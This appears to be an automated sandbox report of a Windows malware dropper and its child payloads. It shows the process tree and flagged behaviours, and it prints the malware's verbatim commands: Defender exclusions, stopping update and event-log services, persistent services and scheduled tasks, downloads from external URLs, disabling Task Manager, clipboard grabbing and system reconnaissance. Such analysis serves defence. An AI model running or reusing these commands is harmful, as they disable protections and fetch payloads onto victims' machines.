Token: SeDebugPrivilege	2580	tasklist.exe
Token: SeDebugPrivilege	4148	taskkill.exe
Token: SeDebugPrivilege	1084	powershell.exe
Token: SeDebugPrivilege	2740	tasklist.exe
Token: SeDebugPrivilege	4844	powershell.exe
Token: SeShutdownPrivilege	4300	powercfg.exe
Token: SeCreatePagefilePrivilege	4300	powercfg.exe
Token: SeShutdownPrivilege	540	powercfg.exe
Token: SeCreatePagefilePrivilege	540	powercfg.exe

Suspicious use of FindShellTrayWindow 30 IoCs

pid	Process
4148	chrome.exe
4148	chrome.exe
4148	chrome.exe
4148	chrome.exe
4148	chrome.exe
4148	chrome.exe
4148	chrome.exe
4148	chrome.exe
4148	chrome.exe
4148	chrome.exe
4148	chrome.exe
4148	chrome.exe
4148	chrome.exe
4148	chrome.exe
4148	chrome.exe
4148	chrome.exe
4148	chrome.exe
4148	chrome.exe
4148	chrome.exe
4148	chrome.exe
4148	chrome.exe
4148	chrome.exe
4148	chrome.exe
4148	chrome.exe
4148	chrome.exe
4148	chrome.exe
4148	chrome.exe
4148	chrome.exe
4148	chrome.exe
4148	chrome.exe

Suspicious use of SendNotifyMessage 28 IoCs

pid	Process
4148	chrome.exe
4148	chrome.exe
4148	chrome.exe
4148	chrome.exe
4148	chrome.exe
4148	chrome.exe
4148	chrome.exe
4148	chrome.exe
4148	chrome.exe
4148	chrome.exe
4148	chrome.exe
4148	chrome.exe
4148	chrome.exe
4148	chrome.exe
4148	chrome.exe
4148	chrome.exe
4148	chrome.exe
4148	chrome.exe
4148	chrome.exe
4148	chrome.exe
4148	chrome.exe
4148	chrome.exe
4148	chrome.exe
4148	chrome.exe
4148	chrome.exe
4148	chrome.exe
4148	chrome.exe
4148	chrome.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4808 wrote to memory of 4996	4808	2379b88d09d15ee3b0e5a6cd83ac92086db55203aafa63149b1216b22ca4837c.exe	85
PID 4808 wrote to memory of 4996	4808	2379b88d09d15ee3b0e5a6cd83ac92086db55203aafa63149b1216b22ca4837c.exe	85
PID 4808 wrote to memory of 4996	4808	2379b88d09d15ee3b0e5a6cd83ac92086db55203aafa63149b1216b22ca4837c.exe	85
PID 4996 wrote to memory of 3896	4996	axplong.exe	92
PID 4996 wrote to memory of 3896	4996	axplong.exe	92
PID 4996 wrote to memory of 3896	4996	axplong.exe	92
PID 3896 wrote to memory of 2524	3896	gold.exe	93
PID 3896 wrote to memory of 2524	3896	gold.exe	93
PID 3896 wrote to memory of 2524	3896	gold.exe	93
PID 3896 wrote to memory of 2524	3896	gold.exe	93
PID 3896 wrote to memory of 2524	3896	gold.exe	93
PID 3896 wrote to memory of 2524	3896	gold.exe	93
PID 3896 wrote to memory of 2524	3896	gold.exe	93
PID 3896 wrote to memory of 2524	3896	gold.exe	93
PID 4996 wrote to memory of 3776	4996	axplong.exe	97
PID 4996 wrote to memory of 3776	4996	axplong.exe	97
PID 4996 wrote to memory of 3776	4996	axplong.exe	97
PID 3776 wrote to memory of 2188	3776	NewLatest.exe	99
PID 3776 wrote to memory of 2188	3776	NewLatest.exe	99
PID 3776 wrote to memory of 2188	3776	NewLatest.exe	99
PID 4996 wrote to memory of 4904	4996	axplong.exe	100
PID 4996 wrote to memory of 4904	4996	axplong.exe	100
PID 4904 wrote to memory of 4468	4904	Installer.exe	101
PID 4904 wrote to memory of 4468	4904	Installer.exe	101
PID 4468 wrote to memory of 3860	4468	cmd.exe	103
PID 4468 wrote to memory of 3860	4468	cmd.exe	103
PID 4468 wrote to memory of 5072	4468	cmd.exe	104
PID 4468 wrote to memory of 5072	4468	cmd.exe	104
PID 4468 wrote to memory of 4928	4468	cmd.exe	105
PID 4468 wrote to memory of 4928	4468	cmd.exe	105
PID 2188 wrote to memory of 2760	2188	Hkbsse.exe	106
PID 2188 wrote to memory of 2760	2188	Hkbsse.exe	106
PID 4996 wrote to memory of 4976	4996	axplong.exe	107
PID 4996 wrote to memory of 4976	4996	axplong.exe	107
PID 4996 wrote to memory of 4976	4996	axplong.exe	107
PID 4976 wrote to memory of 4004	4976	ldr.exe	110
PID 4976 wrote to memory of 4004	4976	ldr.exe	110
PID 4976 wrote to memory of 4004	4976	ldr.exe	110
PID 4996 wrote to memory of 5020	4996	axplong.exe	111
PID 4996 wrote to memory of 5020	4996	axplong.exe	111
PID 4996 wrote to memory of 5020	4996	axplong.exe	111
PID 4468 wrote to memory of 3776	4468	cmd.exe	112
PID 4468 wrote to memory of 3776	4468	cmd.exe	112
PID 5020 wrote to memory of 2488	5020	alex5555555.exe	113
PID 5020 wrote to memory of 2488	5020	alex5555555.exe	113
PID 5020 wrote to memory of 2488	5020	alex5555555.exe	113
PID 5020 wrote to memory of 2488	5020	alex5555555.exe	113
PID 5020 wrote to memory of 2488	5020	alex5555555.exe	113
PID 5020 wrote to memory of 2488	5020	alex5555555.exe	113
PID 5020 wrote to memory of 2488	5020	alex5555555.exe	113
PID 5020 wrote to memory of 2488	5020	alex5555555.exe	113
PID 3776 wrote to memory of 2540	3776	powershell.exe	116
PID 3776 wrote to memory of 2540	3776	powershell.exe	116
PID 4996 wrote to memory of 4840	4996	axplong.exe	118
PID 4996 wrote to memory of 4840	4996	axplong.exe	118
PID 4996 wrote to memory of 4840	4996	axplong.exe	118
PID 2488 wrote to memory of 756	2488	RegAsm.exe	119
PID 2488 wrote to memory of 756	2488	RegAsm.exe	119
PID 2488 wrote to memory of 756	2488	RegAsm.exe	119
PID 2488 wrote to memory of 4188	2488	RegAsm.exe	120
PID 2488 wrote to memory of 4188	2488	RegAsm.exe	120
PID 2488 wrote to memory of 4188	2488	RegAsm.exe	120
PID 2540 wrote to memory of 4884	2540	cmd.exe	122
PID 2540 wrote to memory of 4884	2540	cmd.exe	122

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
684	attrib.exe

C:\Users\Admin\AppData\Local\Temp\2379b88d09d15ee3b0e5a6cd83ac92086db55203aafa63149b1216b22ca4837c.exe
"C:\Users\Admin\AppData\Local\Temp\2379b88d09d15ee3b0e5a6cd83ac92086db55203aafa63149b1216b22ca4837c.exe"
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4808
- C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe
  "C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe"
  2⤵
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Checks computer location settings
  - Executes dropped EXE
  - Identifies Wine through registry keys
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:4996
- - C:\Users\Admin\AppData\Local\Temp\1000035001\gold.exe
    "C:\Users\Admin\AppData\Local\Temp\1000035001\gold.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Suspicious use of WriteProcessMemory
    PID:3896
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
      4⤵
      PID:2524
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3896 -s 308
      4⤵
      Program crash
      PID:4344
- - C:\Users\Admin\AppData\Local\Temp\1000064001\NewLatest.exe
    "C:\Users\Admin\AppData\Local\Temp\1000064001\NewLatest.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Drops file in Windows directory
    - Suspicious use of WriteProcessMemory
    PID:3776
  - - C:\Users\Admin\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
      "C:\Users\Admin\AppData\Local\Temp\b66a8ae076\Hkbsse.exe"
      4⤵
      Checks computer location settings
      Executes dropped EXE
      Suspicious use of WriteProcessMemory
      PID:2188
    - - C:\Users\Admin\AppData\Local\Temp\1000023001\FirstZ.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000023001\FirstZ.exe"
        5⤵
        Executes dropped EXE
        Drops file in System32 directory
        Suspicious behavior: EnumeratesProcesses
        
        PID:2760
      - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
        
        C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1084
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
        6⤵
        
        PID:4468
        
        C:\Windows\system32\wusa.exe
        
        wusa /uninstall /kb:890830 /quiet /norestart
        7⤵
        
        PID:3220
      - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop UsoSvc
        6⤵
        Launches sc.exe
        
        PID:3200
      - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop WaaSMedicSvc
        6⤵
        Launches sc.exe
        
        PID:4344
      - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop wuauserv
        6⤵
        Launches sc.exe
        
        PID:1296
      - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop bits
        6⤵
        Launches sc.exe
        
        PID:2696
      - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop dosvc
        6⤵
        Launches sc.exe
        
        PID:2540
      - C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
        6⤵
        Power Settings
        Suspicious use of AdjustPrivilegeToken
        
        PID:540
      - C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
        6⤵
        Power Settings
        
        PID:3300
      - C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
        6⤵
        Power Settings
        
        PID:3252
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        7⤵
        
        PID:4484
      - C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
        6⤵
        Power Settings
        Suspicious use of AdjustPrivilegeToken
        
        PID:4300
      - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe delete "WSNKISKT"
        6⤵
        Launches sc.exe
        
        PID:320
      - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe create "WSNKISKT" binpath= "C:\ProgramData\wikombernizc\reakuqnanrkn.exe" start= "auto"
        6⤵
        Launches sc.exe
        
        PID:2468
      - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop eventlog
        6⤵
        Launches sc.exe
        
        PID:4468
      - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe start "WSNKISKT"
        6⤵
        Launches sc.exe
        
        PID:4760
- - C:\Users\Admin\AppData\Local\Temp\1000091001\Installer.exe
    "C:\Users\Admin\AppData\Local\Temp\1000091001\Installer.exe"
    3⤵
    - Executes dropped EXE
    - Adds Run key to start application
    - Suspicious use of WriteProcessMemory
    PID:4904
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd /c ins.bat
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4468
    - - C:\Windows\system32\schtasks.exe
        
        schtasks.exe /create /SC MINUTE /MO 10 /TN "CCleaner" /TR "\"C:\Program Files\Google\Chrome\Application\chrome.exe\" http://starjod.xyz/Website.php"
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:3860
    - - C:\Windows\system32\schtasks.exe
        
        schtasks.exe /create /SC MINUTE /MO 11 /TN "Updater" /TR "\"C:\Program Files\Google\Chrome\Application\chrome.exe\" http://starjod.xyz/Website.php"
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:5072
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Invoke-WebRequest -Uri 'https://bit.ly/4c7L8Zs' -UseBasicParsing >$null"
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4928
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Start-Process 'C:\Users\Admin\AppData\Local\Temp\install.bat' -Verb runAs -WindowStyle Hidden"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Modifies registry class
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:3776
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\install.bat"
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:2540
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /create /tn "Cleaner" /tr "C:\Users\Admin\AppData\Local\Corporation\File\RemoteExecuteScriptSilent.exe" /sc onstart /delay 0005:00
        7⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:4884
        
        C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /f /v DisableTaskMgr /t REG_DWORD /d 00000001
        7⤵
        Modifies registry key
        
        PID:876
        
        C:\Windows\system32\schtasks.exe
        
        schtasks.exe /create /SC MINUTE /MO 10 /TN "CCleaner" /TR "\"C:\Program Files\Google\Chrome\Application\chrome.exe\" http://starjod.xyz/Website.php" /F
        7⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:1136
        
        C:\Windows\system32\schtasks.exe
        
        schtasks.exe /create /SC MINUTE /MO 11 /TN "Updater" /TR "\"C:\Program Files\Google\Chrome\Application\chrome.exe\" http://starjod.xyz/Website.php" /F
        7⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:3712
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Invoke-WebRequest -Uri 'https://github.com/frielandrews892/File/releases/download/File/File.zip' -OutFile 'C:\Users\Admin\AppData\Local\Corporation.zip'"
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1700
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Expand-Archive -Path 'C:\Users\Admin\AppData\Local\Corporation.zip' -DestinationPath 'C:\Users\Admin\AppData\Local\Corporation'"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:320
    - - C:\Windows\system32\schtasks.exe
        
        schtasks /query /TN "Cleaner"
        5⤵
        
        PID:1340
- - C:\Users\Admin\AppData\Local\Temp\1000108001\ldr.exe
    "C:\Users\Admin\AppData\Local\Temp\1000108001\ldr.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Drops file in Windows directory
    - Suspicious use of WriteProcessMemory
    PID:4976
  - - C:\Users\Admin\AppData\Local\Temp\28feeece5c\Hkbsse.exe
      "C:\Users\Admin\AppData\Local\Temp\28feeece5c\Hkbsse.exe"
      4⤵
      Executes dropped EXE
      PID:4004
- - C:\Users\Admin\AppData\Local\Temp\1000109001\alex5555555.exe
    "C:\Users\Admin\AppData\Local\Temp\1000109001\alex5555555.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Suspicious use of WriteProcessMemory
    PID:5020
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
      4⤵
      Checks computer location settings
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2488
    - - C:\Users\Admin\AppData\Roaming\configurationValue\svhosts.exe
        
        "C:\Users\Admin\AppData\Roaming\configurationValue\svhosts.exe"
        5⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:756
    - - C:\Users\Admin\AppData\Roaming\configurationValue\Explorers.exe
        
        "C:\Users\Admin\AppData\Roaming\configurationValue\Explorers.exe"
        5⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4188
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "RegAsm.exe"
        5⤵
        
        PID:1184
      - C:\Windows\SysWOW64\choice.exe
        
        choice /C Y /N /D Y /T 3
        6⤵
        
        PID:3956
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 5020 -s 276
      4⤵
      Program crash
      PID:2336
- - C:\Users\Admin\AppData\Local\Temp\1000110001\123.exe
    "C:\Users\Admin\AppData\Local\Temp\1000110001\123.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4840
- - C:\Users\Admin\AppData\Local\Temp\1000111001\streamer.exe
    "C:\Users\Admin\AppData\Local\Temp\1000111001\streamer.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    PID:3580
  - - C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
      C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
      4⤵
      PID:4480
- - C:\Users\Admin\AppData\Local\Temp\1000112001\TpWWMUpe0LEV.exe
    "C:\Users\Admin\AppData\Local\Temp\1000112001\TpWWMUpe0LEV.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of SetThreadContext
    PID:5112
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"
      4⤵
      Checks processor information in registry
      PID:3448
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3448 -s 1200
        5⤵
        Program crash
        
        PID:2784
- - C:\Users\Admin\AppData\Local\Temp\1000115001\build.exe
    "C:\Users\Admin\AppData\Local\Temp\1000115001\build.exe"
    3⤵
    - Executes dropped EXE
    PID:1572
  - - C:\Users\Admin\AppData\Local\Temp\onefile_1572_133639708804574833\stub.exe
      "C:\Users\Admin\AppData\Local\Temp\1000115001\build.exe"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:724
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        5⤵
        
        PID:1224
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
        5⤵
        
        PID:4712
      - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic csproduct get uuid
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:4060
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist"
        5⤵
        
        PID:4048
      - C:\Windows\system32\tasklist.exe
        
        tasklist
        6⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:2580
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\MonsterUpdateService\Monster.exe""
        5⤵
        Hide Artifacts: Hidden Files and Directories
        
        PID:1976
      - C:\Windows\system32\attrib.exe
        
        attrib +h +s "C:\Users\Admin\AppData\Local\MonsterUpdateService\Monster.exe"
        6⤵
        Views/modifies file attributes
        
        PID:684
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('%error_message%', 0, 'System Error', 0+16);close()""
        5⤵
        
        PID:1224
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM chrome.exe"
        5⤵
        
        PID:1720
      - C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM chrome.exe
        6⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:4148
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        5⤵
        
        PID:4020
      - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        6⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:2740
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell.exe Get-Clipboard"
        5⤵
        
        PID:1180
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Get-Clipboard
        6⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4844
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "chcp"
        5⤵
        
        PID:3300
      - C:\Windows\system32\chcp.com
        
        chcp
        6⤵
        
        PID:4092
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "chcp"
        5⤵
        
        PID:4484
      - C:\Windows\system32\chcp.com
        
        chcp
        6⤵
        
        PID:3556
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config"
        5⤵
        
        PID:4492
      - C:\Windows\system32\systeminfo.exe
        
        systeminfo
        6⤵
        Gathers system information
        
        PID:384
      - C:\Windows\system32\HOSTNAME.EXE
        
        hostname
        6⤵
        
        PID:2664
      - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic logicaldisk get caption,description,providername
        6⤵
        Collects information from the system
        
        PID:5072
      - C:\Windows\system32\net.exe
        
        net user
        6⤵
        
        PID:684
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user
        7⤵
        
        PID:1848
      - C:\Windows\system32\query.exe
        
        query user
        6⤵
        
        PID:3968
        
        C:\Windows\system32\quser.exe
        
        "C:\Windows\system32\quser.exe"
        7⤵
        
        PID:3020
      - C:\Windows\system32\net.exe
        
        net localgroup
        6⤵
        
        PID:4808
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 localgroup
        7⤵
        
        PID:4908
      - C:\Windows\system32\net.exe
        
        net localgroup administrators
        6⤵
        
        PID:4488
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 localgroup administrators
        7⤵
        
        PID:4692
      - C:\Windows\system32\net.exe
        
        net user guest
        6⤵
        
        PID:672
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user guest
        7⤵
        
        PID:5080
      - C:\Windows\system32\net.exe
        
        net user administrator
        6⤵
        
        PID:1640
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user administrator
        7⤵
        
        PID:3436
      - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic startup get caption,command
        6⤵
        
        PID:4964
      - C:\Windows\system32\tasklist.exe
        
        tasklist /svc
        6⤵
        Enumerates processes with tasklist
        
        PID:4760
      - C:\Windows\system32\ipconfig.exe
        
        ipconfig /all
        6⤵
        Gathers network information
        
        PID:4876
      - C:\Windows\system32\ROUTE.EXE
        
        route print
        6⤵
        
        PID:4868
      - C:\Windows\system32\ARP.EXE
        
        arp -a
        6⤵
        
        PID:4716
      - C:\Windows\system32\NETSTAT.EXE
        
        netstat -ano
        6⤵
        Gathers network information
        
        PID:440
      - C:\Windows\system32\sc.exe
        
        sc query type= service state= all
        6⤵
        Launches sc.exe
        
        PID:1184
      - C:\Windows\system32\netsh.exe
        
        netsh firewall show state
        6⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:384
      - C:\Windows\system32\netsh.exe
        
        netsh firewall show config
        6⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:4732
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "netsh wlan show profiles"
        5⤵
        
        PID:3768
      - C:\Windows\system32\netsh.exe
        
        netsh wlan show profiles
        6⤵
        Event Triggered Execution: Netsh Helper DLL
        
        PID:3956
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
        5⤵
        
        PID:4720
      - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic csproduct get uuid
        6⤵
        
        PID:3284
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
        5⤵
        
        PID:2824
      - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic csproduct get uuid
        6⤵
        
        PID:64

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3896 -ip 3896
1⤵
PID:4952

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 5020 -ip 5020
1⤵
PID:4692

C:\Users\Admin\AppData\Local\Temp\28feeece5c\Hkbsse.exe
C:\Users\Admin\AppData\Local\Temp\28feeece5c\Hkbsse.exe
1⤵
- Executes dropped EXE
PID:3904

C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe
C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:2684

C:\ProgramData\wikombernizc\reakuqnanrkn.exe
C:\ProgramData\wikombernizc\reakuqnanrkn.exe
1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
PID:5064
- C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  PID:4920
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:4844
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
  2⤵
  PID:4452
- - C:\Windows\system32\wusa.exe
    wusa /uninstall /kb:890830 /quiet /norestart
    3⤵
    PID:4484
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop UsoSvc
  2⤵
  - Launches sc.exe
  PID:2216
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop WaaSMedicSvc
  2⤵
  - Launches sc.exe
  PID:684
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop wuauserv
  2⤵
  - Launches sc.exe
  PID:3968
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop bits
  2⤵
  - Launches sc.exe
  PID:4000
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop dosvc
  2⤵
  - Launches sc.exe
  PID:4808
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
  2⤵
  - Power Settings
  PID:2028
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
  2⤵
  - Power Settings
  PID:5080
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
  2⤵
  - Power Settings
  PID:4876
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
  2⤵
  - Power Settings
  PID:3476
- C:\Windows\system32\conhost.exe
  C:\Windows\system32\conhost.exe
  2⤵
  PID:1188
- C:\Windows\explorer.exe
  explorer.exe
  2⤵
  - Modifies data under HKEY_USERS
  PID:2504

C:\Users\Admin\AppData\Local\Temp\28feeece5c\Hkbsse.exe
C:\Users\Admin\AppData\Local\Temp\28feeece5c\Hkbsse.exe
1⤵
- Executes dropped EXE
PID:2488

C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe
C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
